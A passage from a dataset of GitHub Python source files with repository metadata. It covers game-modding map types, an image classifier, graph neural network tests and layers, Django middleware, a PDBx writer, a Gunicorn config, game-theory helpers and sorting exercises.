preferred for ease/efficiency.\n\n variable_name: Name to use in EVS output (typically upper case with underscores).\n verbose_name: Full descriptive name of map for display in certain output-only fields.\n\n `name`, `emevd_file_stem`, `msb_file_stem`, `ai_file_stem`, and `esd_file_stem` all default to\n `m{area_id:02d}_{block_id:02d}_00_00` if not specified. `verbose_name` defaults to `name`. `variable_name`\n defaults to None (not a valid EVS instruction argument).\n \"\"\"\n self.area_id = area_id\n self.block_id = block_id\n self.cc_id = cc_id\n self.dd_id = dd_id\n\n if area_id is not None and block_id is not None:\n base_id = f\"m{area_id:02d}_{block_id:02d}_{cc_id:02d}_{dd_id:02d}\"\n else:\n base_id = None\n self.name = base_id if name is None else name\n\n self.emevd_file_stem = base_id if emevd_file_stem is None else emevd_file_stem\n self.msb_file_stem = base_id if msb_file_stem is None else msb_file_stem\n self.ai_file_stem = base_id if ai_file_stem is None else ai_file_stem\n self.esd_file_stem = base_id if esd_file_stem is None else esd_file_stem\n self.map_load_tuple = (area_id, block_id, -1, -1) # for `MSBMapConnection`\n self.ffxbnd_file_name = ffxbnd_file_name\n\n self.variable_name = variable_name\n self.verbose_name = self.name if verbose_name is None else verbose_name\n\n if self.area_id is not None:\n self.base_entity_id = 100000 * self.area_id + 10000 * self.block_id\n self.flag_prefix = 1000 + 10 * self.area_id + self.block_id\n\n def stem_set(self):\n return {\n stem\n for stem in (self.emevd_file_stem, self.msb_file_stem, self.ai_file_stem, self.esd_file_stem)\n if stem\n }\n\n def __eq__(self, other_map: Map):\n return self.area_id == other_map.area_id and self.block_id == other_map.block_id\n\n def __iter__(self):\n return iter((self.area_id, self.block_id, self.cc_id, self.dd_id))\n\n def __repr__(self):\n return self.emevd_file_stem\n\n def __getitem__(self, index: int):\n if index == 0:\n return self.area_id\n elif index == 1:\n return self.block_id\n elif index == 2:\n return self.cc_id\n elif index == 3:\n return self.dd_id\n else:\n raise ValueError(f\"Index for `Map` must be 0, 1, 2, or 3, not {index}.\")\n\n @classmethod\n def NO_MAP(cls):\n \"\"\"Used as a default null map in MSB.\"\"\"\n return cls(0, 0, 0, 0, name=\"NONE\")\n\n\nclass MapEntry(BaseGameObject):\n \"\"\"Anything that appears in an MSB.\"\"\"\n @classmethod\n def get_msb_entry_type_subtype(cls, pluralized_subtype=False) -> [str, str]:\n \"\"\"Returns the pluralized name of the MSB type (e.g. \"Parts\") and the non-pluralized name of the subtype\n (e.g. \"Character\").\"\"\"\n raise NotImplementedError\n\n @classmethod\n def get_msb_class_name(cls) -> str:\n \"\"\"Returns the name of the Soulstruct MSB class (e.g. \"MSBRegionBox\").\n\n By default, this is done by simply prefixing \"MSB\" to the class name.\"\"\"\n if cls.__name__ == \"MapEntry\":\n raise NotImplementedError(\"MapEntry base class has no corresponding non-abstract MSB class.\")\n return f\"MSB{cls.__name__}\"\n\n\n@unique\nclass MapEntity(MapEntry, IntEnum):\n \"\"\"Any MSB entry with an entity ID (enum values).\"\"\"\n\n @classmethod\n def get_msb_entry_type_subtype(cls, pluralized_subtype=False) -> [str, str]:\n raise NotImplementedError\n\n @classmethod\n def get_id_start_and_max(cls) -> tuple[int, int]:\n \"\"\"Return first and last entity ID value for automatic generation of entity IDs for specific `game`.\n\n Not supported by default; supported subclasses will override this method.\n \"\"\"\n raise TypeError(f\"`{cls.__name__}` does not use entity IDs.\")\n\n @classmethod\n def auto_generate(cls, count, map_range_start: int):\n \"\"\"Get value for `auto()`.\n\n Raises `TypeError` if not valid for this class, and `NotImplementedError` if not implemented for given `game`.\n \"\"\"\n start_value, max_value = cls.get_id_start_and_max()\n value = map_range_start + start_value + count\n if value > map_range_start + max_value:\n raise ValueError(f\"Too many members in `{cls.__name__}` for `auto()` range `({start_value}, {max_value})`.\")\n return value\n\n # noinspection PyMethodOverriding\n @staticmethod\n def _generate_next_value_(name, start, count, last_values):\n raise ValueError(\"Cannot use `auto()` for this `MapEntity` subclass.\")\n\n\nMapTyping = tp.Union[Map, tuple, list]\n","repo_name":"Grimrukh/soulstruct","sub_path":"soulstruct/base/game_types/map_types.py","file_name":"map_types.py","file_ext":"py","file_size_in_byte":7429,"program_lang":"python","lang":"en","doc_type":"code","stars":129,"dataset":"github-code","pt":"37"} +{"seq_id":"9728469368","text":"from __future__ import print_function\nimport torch\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport torchvision\nimport numpy as np\nimport os\nimport shutil\nfrom collections import OrderedDict\nfrom tqdm import tqdm\n\n# model\nclass MyModel(nn.Module):\n def __init__(self, num_classes, model_name=\"resnet101\", backbone_size=2048, pretrained=False, droprate=0.0,\n device=\"cpu\"):\n super(MyModel, self).__init__()\n self.pretrained = pretrained\n\n _model = torchvision.models.resnet.__dict__[model_name](pretrained=pretrained)\n self.backbone = nn.Sequential(OrderedDict([\n ('conv1', _model.conv1),\n ('bn1', _model.bn1),\n ('relu1', _model.relu),\n ('maxpool1', _model.maxpool),\n\n (\"layer1\", _model.layer1),\n (\"layer2\", _model.layer2),\n (\"layer3\", _model.layer3),\n (\"layer4\", _model.layer4),\n ]))\n self._conv1 = nn.Sequential(\n nn.Dropout(droprate),\n nn.Conv2d(backbone_size, num_classes, 1, 1),\n nn.BatchNorm2d(num_classes),\n nn.ReLU()\n )\n self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n # self.avgpool = nn.AvgPool2d(1,stride=7,padding=0))\n # self.fc = nn.Linear(512 * block.expansion, num_classes)\n\n def forward(self, x):\n x = self.backbone(x)\n x = self._conv1(x)\n x = self.avgpool(x)\n x = torch.flatten(x, 1)\n # x = self.fc(x)\n return x\n\n\ndef predict(model, device, test_loader,category=[]):\n model.eval()\n with torch.no_grad():\n for data, path in tqdm(test_loader):\n data = data.to(device)\n output = F.softmax(model(data),-1)\n score,pred = output.max(1, keepdim=False)\n for _score,_pred,_path in zip(score,pred,path):\n label=category[int(_pred)]\n if _score<0.8:label=\"unknow\"\n save_path=os.path.join(os.path.dirname(_path),label)\n if not os.path.exists(save_path):os.makedirs(save_path)\n # save_path=os.path.join(save_path,os.path.basename(_path).replace(\".jpg\",\"_%0.3f.jpg\"%(_score)))\n save_path=os.path.join(save_path,os.path.basename(_path))\n shutil.move(_path,save_path)\n\n# base_dir = \"/media/wucong/work/practice/data/tomato\"\n# category=sorted(os.listdir(os.path.join(base_dir, \"train\")))\n# print(category)\ncategory=['Tomato___Bacterial_spot', 'Tomato___Early_blight', 'Tomato___Late_blight', 'Tomato___Leaf_Mold',\n 'Tomato___Septoria_leaf_spot', 'Tomato___Spider_mites_Two_spotted_spider_mite', 'Tomato___Target_Spot',\n 'Tomato___Tomato_Yellow_Leaf_Curl_Virus', 'Tomato___Tomato_mosaic_virus', 'Tomato___healthy']\n","repo_name":"wucng/Study","sub_path":"cuda/tensorrt/python/example/service/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38169745221","text":"from typing import Callable\n\nimport jax\nimport jax.numpy as jnp\nimport haiku as hk\nimport chex\n\nfrom eacf.utils.test import assert_is_invariant, assert_is_equivariant\nfrom eacf.nets.make_egnn import EquivariantForwardFunction\nfrom eacf.nets.en_gnn import make_egnn_torso_forward_fn, EGNNTorsoConfig\nfrom eacf.utils.graph import get_senders_and_receivers_fully_connected\n\n\ndef make_egnn_torso(\n n_invariant_feat_hidden: int = 5,\n n_vectors_hidden_per_vec_in: int = 2) -> EquivariantForwardFunction:\n config = EGNNTorsoConfig(\n n_blocks=2,\n mlp_units=(2,2),\n n_vectors_hidden_per_vec_in=n_vectors_hidden_per_vec_in,\n n_invariant_feat_hidden=n_invariant_feat_hidden,\n name='e3gnn_torso')\n egnn_torso = make_egnn_torso_forward_fn(config)\n return egnn_torso\n\n\ndef tesst_net_does_not_smoke(\n make_torso: Callable[[int, int], EquivariantForwardFunction],\n n_invariant_feat_hidden: int = 5,\n n_vectors_hidden_per_vec_in: int = 2,\n dim: int = 2,\n n_nodes: int = 5,\n vec_multiplicity_in: int = 2) -> None:\n \"\"\"Basis test that the egnn doesn't throw an error, and of invariance and equivariances.\"\"\"\n\n @hk.without_apply_rng\n @hk.transform\n def forward(positions, features):\n egnn_torso = make_torso(n_invariant_feat_hidden, n_vectors_hidden_per_vec_in)\n senders, receivers = get_senders_and_receivers_fully_connected(n_nodes)\n vectors, scalars = egnn_torso(positions, features, senders, receivers)\n return vectors, scalars\n\n\n key = jax.random.PRNGKey(0)\n positions = jax.random.normal(key, (n_nodes, vec_multiplicity_in, dim))\n features = jnp.ones((n_nodes, 2))\n\n params = forward.init(key, positions, features)\n\n vectors, scalars = forward.apply(params, positions, features)\n chex.assert_shape(vectors, (n_nodes, vec_multiplicity_in*n_vectors_hidden_per_vec_in, dim))\n chex.assert_shape(scalars, (n_nodes, n_invariant_feat_hidden))\n\n def invariant_fn(positions: chex.Array) -> chex.Array:\n vectors, scalars = forward.apply(params, positions, features)\n chex.assert_shape(scalars, (n_nodes, n_invariant_feat_hidden))\n return scalars\n\n def equivariant_fn(positions: chex.Array) -> chex.Array:\n vectors, scalars = forward.apply(params, positions, features)\n chex.assert_shape(vectors, (n_nodes, vec_multiplicity_in * n_vectors_hidden_per_vec_in, dim))\n return vectors\n\n # Note: features are permutation invariant, so we the test can group action can include permutation.\n assert_is_invariant(invariant_fn=invariant_fn, key=key, event_shape=positions.shape,\n translate=False)\n assert_is_equivariant(equivariant_fn=equivariant_fn, key=key, event_shape=positions.shape,\n translate=False, permute=True)\n print('Test passed!')\n\n\n\n\nif __name__ == '__main__':\n USE_64_BIT = True\n if USE_64_BIT:\n from jax.config import config\n config.update(\"jax_enable_x64\", True)\n\n tesst_net_does_not_smoke(make_egnn_torso)\n","repo_name":"lollcat/se3-augmented-coupling-flows","sub_path":"eacf/nets/torso_tests.py","file_name":"torso_tests.py","file_ext":"py","file_size_in_byte":3081,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} +{"seq_id":"32053895716","text":"import traceback\n\nfrom django.core.exceptions import PermissionDenied, ObjectDoesNotExist, ValidationError\nfrom django.http import JsonResponse\nfrom django.utils.deprecation import MiddlewareMixin\nfrom general.core.logging import get_logger\nfrom general.views import JSONResponseMixin\n\nlogger = get_logger('middleware')\n\n\nclass ExceptionProcessingMiddleware(MiddlewareMixin):\n\n # def __init__(self, get_response):\n # # self.get_response = get_response\n # self.mongo_log_db = MongoDB().col_opt_log()\n # super().__init__(get_response)\n # # One-time configuration and initialization.\n # # Initialize first starting of the system\n\n # def __call__(self, request):\n # # Code to be executed for each request before\n # # the view (and later middleware) are called.\n # super().__call__(request)\n # response = self.get_response(request)\n #\n # # Code to be executed for each request/response after\n # # the view is called.\n #\n # return response\n\n def process_view(self, request, view_func, *view_args, **view_kwargs):\n \"\"\"\n call before view executing\n \"\"\"\n if hasattr(view_func.__class__, 'json') and view_func.__class__.json:\n request.response_type = 'json'\n else:\n request.response_type = 'html'\n\n def process_exception(self, request, exception):\n \"\"\"\n Call when raise an exception\n \"\"\"\n if request.response_type == 'json':\n code = 500\n level = 'error'\n data = None\n if isinstance(exception, PermissionDenied):\n messages = '权限不足'\n level = 'warning'\n code = 403\n elif isinstance(exception, ObjectDoesNotExist):\n messages = list()\n for item in exception.args:\n messages.append('对象不存在 %s' % item)\n level = 'error'\n code = 404\n elif isinstance(exception, ValidationError):\n code = 402\n messages = exception.message\n else:\n messages = str(exception)\n logger.error(messages)\n logger.error(traceback.format_exc())\n return JSONResponseMixin.json_response(\n result=False, messages=messages, code=code, level=level, data=data\n )\n else:\n logger.error(str(exception))\n logger.error(traceback.format_exc())\n","repo_name":"maoxiaowang/novel","sub_path":"sandbook/base/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"21754006673","text":"from collections import defaultdict\nfrom pathlib import Path\n\nimport pandas as pd # type: ignore\n\n\ndef write_pdbx(pdbx: dict[str, pd.DataFrame], file_name: str) -> None:\n \"\"\"\n Write a dict of Pandas DataFrames into a PDBx file.\n\n Args:\n pdbx (dict[str, pd.DataFrame]): a dict of Pandas DataFrames to write.\n file_name (str): file name to write the PDBx file.\n\n Returns:\n None\n \"\"\"\n # Validate\n if not (type(pdbx) is dict):\n raise TypeError(f\"pdbx has to be a dict but {type(pdbx)} is providied.\")\n multi_record: dict[str, int] = defaultdict(bool)\n max_tag_length: dict[str, int] = defaultdict(int)\n for category_name, records in pdbx.items():\n if not (type(records) is pd.DataFrame):\n raise TypeError(\n f\"pdbx values have to be Pandas Dataframes but {category_name} is a {type(records)}.\"\n )\n if len(records) > 1:\n multi_record[category_name] = True\n for col in records.columns:\n tag_length = len(category_name) + 1 + len(col)\n max_tag_length[category_name] = max(\n max_tag_length[category_name], tag_length\n )\n with open(file_name, \"w\") as f:\n # write header\n target_name = Path(file_name).name\n if \".cif\" == target_name[-4:]:\n f.write(f\"data_{target_name[:-4]}\\n\")\n else:\n f.write(f\"data_{target_name}\\n\")\n # write each category\n for category_name, records in pdbx.items():\n # categories that only have a record\n f.write(\"#\\n\")\n if not multi_record[category_name]:\n for col in records.columns:\n tag = f\"{category_name}.{col}\"\n f.write(f\"{tag:{max_tag_length[category_name]+3}}\")\n content = records[col].iloc[0]\n if '\"' in content and \"'\" in content:\n raise ValueError(\n f\"'{content}' cannot be written into a PDBx file.\"\n )\n elif \"'\" in content:\n content = f'\"{content}\"'\n elif '\"' in content:\n content = f\"'{content}'\"\n elif \" \" in content:\n content = f\"'{content}'\"\n\n content_length = len(content)\n if tag_length + content_length > 130:\n content = content.strip('\"').strip(\"'\")\n f.write(\"\\n;\")\n if category_name == \"_struct_ref\":\n for i in range(0, content_length // 80):\n f.write(f\"{content[80*i:80*(i+1)]}\\n\")\n else:\n f.write(f\"{content}\\n\")\n f.write(\";\\n\")\n else:\n f.write(f\"{content}\\n\")\n\n # categories that have multiple records\n else:\n max_col_length = defaultdict(int)\n for col in records.columns:\n max_col_length[col] = max(records[col].str.len())\n if records[col].str.contains(\" \").any():\n max_col_length[col] = max_col_length[col] + 2\n f.write(f\"{category_name}.{col}\\n\")\n for _, record in records.iterrows():\n for col in records.columns:\n content = record[col]\n pad_length = max_col_length[col]\n if '\"' in content and \"'\" in content:\n raise ValueError(\n f\"'{content}' cannot be written into a PDBx file.\"\n )\n elif \"'\" in content:\n content = f'\"{content}\"'\n elif '\"' in content:\n content = f\"'{content}'\"\n elif \" \" in content:\n content = f\"'{content}'\"\n\n f.write(f\"{content:<{pad_length+1}}\")\n f.write(\"\\n\")\n\n f.write(\"#\")\n","repo_name":"Ruibin-Liu/pdbx2df","sub_path":"pdbx2df/write_pdbx.py","file_name":"write_pdbx.py","file_ext":"py","file_size_in_byte":4202,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"19149223121","text":"# _*_ coding:utf-8 _*_\n\nimport json\nimport warnings\n\nwarnings.filterwarnings('ignore')\n\ndef get_train_data(input_file):\n corpus = []\n labels = []\n entitys = []\n with open(input_file, 'r', encoding='utf-8') as f:\n for line in f:\n tmp = json.loads(line.strip())\n raw_contents = tmp['content']\n raw_entitys = tmp['entity']\n label = int(tmp[\"label\"])\n if label == -2:\n label = 4\n elif label == -1:\n label = 3\n for entity in [raw_entitys]:\n text = raw_contents.strip()\n corpus.append(text)\n entitys.append(entity)\n labels.append(label)\n assert len(corpus) == len(labels) == len(entitys)\n return corpus, labels, entitys\n\n\ndef get_test_data(input_file):\n ids = []\n corpus = []\n entitys = []\n with open(input_file, 'r', encoding='utf-8') as f:\n lines = f.readlines()\n for line in lines:\n tmp = json.loads(line.strip())\n raw_id = tmp['id']\n raw_contents = tmp['content']\n raw_entitys = tmp['entity']\n for entity in [raw_entitys]:\n text = raw_contents.strip()\n corpus.append(text)\n ids.append(raw_id)\n entitys.append(entity)\n assert len(corpus) == len(entitys) == len(ids)\n return corpus, entitys, ids\n","repo_name":"shengch/PromptBert","sub_path":"src/utils/load_datasets.py","file_name":"load_datasets.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"30692155693","text":"# Define application module path\nwsgi_app = 'src.main:app'\n\n# Bind application to available ip address\nbind = '0.0.0.0:80'\n\n# Worker count\nworkers = 1\n\n# Force Gunicorn to use Uvicorn workers\nworker_class = 'uvicorn.workers.UvicornWorker'\n\n# Preload whole application once before forking it for workers\npreload_app = True\n\n# Write application logs to stdout\naccesslog = '-'\nerrorlog = '-'\n","repo_name":"sandermollerr/celery-setup-example","sub_path":"services/api/src/gunicorn.config.py","file_name":"gunicorn.config.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72379701867","text":"import itertools\n\nfrom absl import logging # pylint:disable=unused-import\n\nimport numpy as np\n\n\ndef construct_game_queries(base_profile, num_checkpts):\n \"\"\"Constructs a list of checkpoint selection tuples to query value function.\n\n Each query tuple (key, query) where key = (pi, pj) and query is\n (p1's selected checkpt, ..., p7's selected checkpt) fixes the players in the\n game of diplomacy to be played. It may be necessary to play several games with\n the same players to form an accurate estimate of the value or payoff for each\n player as checkpts contain stochastic policies.\n\n Args:\n base_profile: list of selected checkpts for each player, i.e.,\n a sample from the player strategy profile ([x_i ~ p(x_i)])\n num_checkpts: list of ints, number of strats (or ckpts) per player\n Returns:\n Set of query tuples containing a selected checkpoint index for each player.\n \"\"\"\n new_queries = set([])\n\n num_players = len(base_profile)\n for pi, pj in itertools.combinations(range(num_players), 2):\n new_profile = list(base_profile)\n for ai in range(num_checkpts[pi]):\n new_profile[pi] = ai\n for aj in range(num_checkpts[pj]):\n new_profile[pj] = aj\n query = tuple(new_profile)\n pair = (pi, pj)\n new_queries.update([(pair, query)])\n\n return new_queries\n\n\ndef construct_game_queries_for_exp(base_profile, num_checkpts):\n \"\"\"Constructs a list of checkpoint selection tuples to query value function.\n\n Each query tuple (key, query) where key = (pi,) and query is\n (p1's selected checkpt, ..., p7's selected checkpt) fixes the players in the\n game of diplomacy to be played. It may be necessary to play several games with\n the same players to form an accurate estimate of the value or payoff for each\n player as checkpts contain stochastic policies.\n\n Args:\n base_profile: list of selected checkpts for each player, i.e.,\n a sample from the player strategy profile ([x_i ~ p(x_i)])\n num_checkpts: list of ints, number of strats (or ckpts) per player\n Returns:\n Set of query tuples containing a selected checkpoint index for each player.\n \"\"\"\n new_queries = set([])\n\n num_players = len(base_profile)\n for pi in range(num_players):\n new_profile = list(base_profile)\n for ai in range(num_checkpts[pi]):\n new_profile[pi] = ai\n query = tuple(new_profile)\n new_queries.update([(pi, query)])\n\n return new_queries\n\n\ndef run_games_and_record_payoffs(game_queries, evaluate_game, ckpt_to_policy):\n \"\"\"Simulate games according to game queries and return results.\n\n Args:\n game_queries: set of tuples containing indices specifying each players strat\n key_query = (agent_tuple, profile_tuple) format\n evaluate_game: callable function that takes a list of policies as argument\n ckpt_to_policy: list of maps from strat (or checkpoint) to a policy, one\n map for each player\n Returns:\n dictionary: key=key_query, value=np.array of payoffs (1 for each player)\n \"\"\"\n game_results = {}\n for key_query in game_queries:\n _, query = key_query\n policies = [ckpt_to_policy[pi][ckpt_i] for pi, ckpt_i in enumerate(query)]\n payoffs = evaluate_game(policies)\n game_results.update({key_query: payoffs})\n return game_results\n\n\ndef form_payoff_matrices(game_results, num_checkpts):\n \"\"\"Packages dictionary of game results into a payoff tensor.\n\n Args:\n game_results: dictionary of payoffs for each game evaluated, keys are\n (pair, profile) where pair is a tuple of the two agents played against\n each other and profile indicates pure joint action played by all agents\n num_checkpts: list of ints, number of strats (or ckpts) per player\n Returns:\n payoff_matrices: dict of np.arrays (2 x num_checkpts x num_checkpts) with\n payoffs for two players. keys are pairs above with lowest index agent\n first\n \"\"\"\n num_players = len(num_checkpts)\n payoff_matrices = {}\n for pi, pj in itertools.combinations(range(num_players), 2):\n key = (pi, pj)\n payoff_matrices[key] = np.zeros((2, num_checkpts[pi], num_checkpts[pj]))\n for key_profile, payoffs in game_results.items():\n key, profile = key_profile\n i, j = key\n ai = profile[i]\n aj = profile[j]\n payoff_matrices[key][0, ai, aj] = payoffs[i]\n payoff_matrices[key][1, ai, aj] = payoffs[j]\n return payoff_matrices\n","repo_name":"deepmind/open_spiel","sub_path":"open_spiel/python/algorithms/adidas_utils/helpers/nonsymmetric/game_runner.py","file_name":"game_runner.py","file_ext":"py","file_size_in_byte":4333,"program_lang":"python","lang":"en","doc_type":"code","stars":3700,"dataset":"github-code","pt":"37"} +{"seq_id":"35833770738","text":"def sortList(array):\n length = len(array)\n\n for item in range(length):\n minimum = item\n\n for i in range(item + 1, length):\n if array[i] < array[minimum]:\n minimum = i\n (array[item], array[minimum]) = (array[minimum], array[item])\n return array\n\n\ndef bubbleSort(arr):\n n = len(arr)\n swapped = False\n for i in range(n - 1):\n for j in range(0, n - i - 1):\n if arr[j] > arr[j + 1]:\n swapped = True\n arr[j], arr[j + 1] = arr[j + 1], arr[j]\n if not swapped:\n return\n\n\ndef merge(arr, l, m, r):\n n1 = m - l + 1\n n2 = r - m\n L = [0] * (n1)\n R = [0] * (n2)\n for i in range(0, n1):\n L[i] = arr[l + i]\n\n for j in range(0, n2):\n R[j] = arr[m + 1 + j]\n\n i = 0\n j = 0\n k = l\n\n while i < n1 and j < n2:\n if L[i] <= R[j]:\n arr[k] = L[i]\n i += 1\n else:\n arr[k] = R[j]\n j += 1\n k += 1\n\n while i < n1:\n arr[k] = L[i]\n i += 1\n k += 1\n\n while j < n2:\n arr[k] = R[j]\n j += 1\n k += 1\n\n\ndef mergeSort(l,r,arr):\n if l < r:\n m = l + (r - l) // 2\n mergeSort(arr, l, m)\n mergeSort(arr, m + 1, r)\n merge(arr, l, m, r)\n\n\ndef insertionSort(arr):\n for i in range(1, len(arr)):\n\n key = arr[i]\n j = i - 1\n while j >= 0 and key < arr[j]:\n arr[j + 1] = arr[j]\n j -= 1\n arr[j + 1] = key\n\n\ndef partition(l, r, nums):\n pivot, ptr = nums[r], l\n for i in range(l, r):\n if nums[i] <= pivot:\n nums[i], nums[ptr] = nums[ptr], nums[i]\n ptr += 1\n nums[ptr], nums[r] = nums[r], nums[ptr]\n return ptr\n\n\ndef quicksort(l, r, nums):\n if len(nums) == 1:\n return nums\n if l < r:\n pi = partition(l, r, nums)\n quicksort(l, pi - 1, nums)\n quicksort(pi + 1, r, nums)\n return nums\n\n\na = [3,4,5,1,2,6,7,100,99,98,97,96,95,80,79]\nb = [3,4,5,1,2,6,7,101,94,93,92,91,90,82,81]\nc = [3,4,5,1,2,6,7,102,89,88,87,86,85,84,83]\n\nd = a + b\nd = list(set(d)- set(c))\nprint(sortList(d))\nbubbleSort(d)\nprint(d)\nmergeSort(0,len(d)-1,d)\nprint(d)\ninsertionSort(d)\nprint(d)\nquicksort(0,len(d)-1,d)\nprint(d)\n\n","repo_name":"oltoir/ads-retake","sub_path":"TITS 5/2.5.py","file_name":"2.5.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13746048927","text":"# -*- encoding: utf-8 -*-\nimport copy\nfrom dgl._deprecate.graph import DGLGraph\nfrom dgl._ffi.function import get_global_func\nfrom numpy.lib.arraysetops import isin\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport dgl\nimport dgl.function as fn\nimport dgl.nn.pytorch as dglnn\nfrom collections import namedtuple\nimport torch.nn.functional as F\nimport copy\n# from torch.nn import LayerNorm\nfrom torch.autograd import Variable\nimport torch.nn.init as I\nimport numpy as np\nimport math\nfrom commonLayers import Encoder, Decoder\n\n# dgl.batch\n# DGLGraph\n# Distpatcher是一个graph based的\n\nEdgeGraph = namedtuple(\n 'EdgeGraph', ['nodes', 'edges', 'out_list', 'in_list', 'node2edge'])\n\n\nclass NLLLoss(nn.Module):\n def __init__(self, eps=1, lamb=0.5, use_weight=False):\n super(NLLLoss, self).__init__()\n self.eps = eps\n self.lamb = lamb\n self.use_weight = use_weight\n\n def forward(self, ins, target):\n '''input: (n_mu, n_sigma, e_mu, e_sigma)\n target: (batch_node_key, batch_node_value, batch_edge_key, batch_edge_value)\n batch_node_key = (N): flatten_index\n batch_node_value = (N)\n batch_edge_key = (M ): flatten_index\n batch_edge_key = (M)\n '''\n n_mu, n_sigma2, e_mu, e_sigma2 = ins\n batch_node_key, batch_node_value, batch_edge_key, batch_edge_value = target\n pre_node_mu = n_mu.take(batch_node_key)\n pre_node_sigma2 = n_sigma2.take(batch_node_key)\n pre_edge_mu = e_mu.take(batch_edge_key)\n pre_edge_sigma2 = e_sigma2.take(batch_edge_key)\n\n # print(batch_node_value.shape)\n\n # print(batch_node_value, batch_edge_value)\n # print(torch.sum(n_mu < 0), torch.sum(n_sigma2 < 0),\n # torch.sum(e_mu < 0), torch.sum(e_sigma2 < 0))\n # print(torch.sum(batch_node_value < 0),\n # torch.sum(batch_edge_value < 0))\n # print(torch.mean((batch_node_value-pre_node_mu)\n # ** 2/(self.eps+pre_node_sigma2)), torch.mean((batch_edge_value-pre_edge_mu)**2/(self.eps+pre_edge_sigma2)))\n # print(torch.mean((batch_node_value-pre_node_mu)\n # ** 2), torch.mean((batch_edge_value-pre_edge_mu)**2))\n if self.use_weight:\n node_loss = torch.mean(1.0/2*torch.log(self.eps+pre_node_sigma2) +\n (batch_node_value[:, 0]-pre_node_mu)**2/(self.eps+pre_node_sigma2))\n edge_loss = torch.mean(1.0/2*torch.log(self.eps+pre_edge_sigma2) +\n (batch_edge_value[:, 0]-pre_edge_mu)**2/(self.eps+pre_edge_sigma2))\n else:\n node_loss = torch.mean((1.0/2*torch.log(self.eps+pre_node_sigma2) +\n (batch_node_value[:, 0]-pre_node_mu)**2/(self.eps+pre_node_sigma2))*batch_node_value[:, 1])\n edge_loss = torch.mean((1.0/2*torch.log(self.eps+pre_edge_sigma2) +\n (batch_edge_value[:, 0]-pre_edge_mu)**2/(self.eps+pre_edge_sigma2))*batch_edge_value[:, 1])\n\n return node_loss, edge_loss, node_loss*self.lamb+edge_loss*(1-self.lamb)\n\n\nclass TestNLLLoss(nn.Module):\n def __init__(self, eps=1, lamb=0.5, kind=0, use_weight=False):\n super(TestNLLLoss, self).__init__()\n self.eps = eps\n self.lamb = lamb\n self.kind = kind\n self.use_weight = use_weight\n\n def forward(self, ins, target):\n n_mu, n_sigma2, e_mu, e_sigma2 = ins\n batch_node_key, batch_node_value, batch_edge_key, batch_edge_value = target\n pre_node_mu = n_mu.take(batch_node_key)\n pre_node_sigma2 = n_sigma2.take(batch_node_key)\n pre_edge_mu = e_mu.take(batch_edge_key)\n pre_edge_sigma2 = e_sigma2.take(batch_edge_key)\n node_loss = torch.mean(1.0/2*torch.log(self.eps+pre_node_sigma2) +\n (batch_node_value[:, 0]-pre_node_mu)**2/(self.eps+pre_node_sigma2)) if self.use_weight is False else torch.mean((1.0/2*torch.log(self.eps+pre_node_sigma2) +\n (batch_node_value[:, 0]-pre_node_mu)**2/(self.eps+pre_node_sigma2))*batch_node_value[:, 1])\n edge_loss = torch.mean(1.0/2*torch.log(self.eps+pre_edge_sigma2) +\n (batch_edge_value[:, 0]-pre_edge_mu)**2/(self.eps+pre_edge_sigma2)) if self.use_weight is False else torch.mean((1.0/2*torch.log(self.eps+pre_edge_sigma2) +\n (batch_edge_value[:, 0]-pre_edge_mu)**2/(self.eps+pre_edge_sigma2))*batch_edge_value[:, 1])\n if self.kind == 1:\n return node_loss\n elif self.kind == 2:\n return edge_loss\n else:\n return node_loss*self.lamb+edge_loss*(1-self.lamb)\n\n\nclass GATLayer(nn.Module):\n def __init__(self, in_dim, out_dim,\n num_heads,\n edge_type_num, # 确定边的种类\n feat_drop=0.,\n attn_drop=0.,\n negative_slope=0.2,\n residual=False,\n activation=None,\n allow_zero_in_degree=True,\n cat=True,\n node_feature_dim=None,\n edge_feature_dim=None,\n use_static_feature=False):\n super(GATLayer, self).__init__()\n if type(in_dim) is tuple:\n n_in_dim, e_in_dim = in_dim\n else:\n n_in_dim, e_in_dim = in_dim, in_dim\n self._num_heads = num_heads\n self._in_src_feats, self._in_dst_feats = n_in_dim, n_in_dim\n self._out_feats = out_dim\n self._allow_zero_in_degree = allow_zero_in_degree\n self.fc_n = nn.Linear(n_in_dim, out_dim*num_heads, bias=False)\n self.fc_e = nn.Linear(e_in_dim, out_dim*num_heads, bias=False)\n\n self._cat = cat\n self._edge_type_num = edge_type_num\n self._node_feature_dim = node_feature_dim\n self._edge_feature_dim = edge_feature_dim\n\n self.use_static_feature = use_static_feature\n\n if self.use_static_feature:\n self.attn_l = nn.Parameter(\n torch.FloatTensor(size=(1, num_heads, out_dim+node_feature_dim, self._edge_type_num)))\n self.attn_r = nn.Parameter(\n torch.FloatTensor(size=(1, num_heads, out_dim+node_feature_dim, self._edge_type_num)))\n self.attn_m = nn.Parameter(\n torch.FloatTensor(size=(1, num_heads, out_dim+edge_feature_dim, self._edge_type_num)))\n else:\n self.attn_l = nn.Parameter(\n torch.FloatTensor(size=(1, num_heads, out_dim, self._edge_type_num)))\n self.attn_r = nn.Parameter(\n torch.FloatTensor(size=(1, num_heads, out_dim, self._edge_type_num)))\n self.attn_m = nn.Parameter(\n torch.FloatTensor(size=(1, num_heads, out_dim, self._edge_type_num)))\n\n self.feat_drop = nn.Dropout(feat_drop)\n self.attn_drop = nn.Dropout(attn_drop)\n self.leaky_relu = nn.LeakyReLU(negative_slope)\n if residual:\n if self._in_dst_feats != out_dim:\n self.res_fc_n = nn.Linear(\n 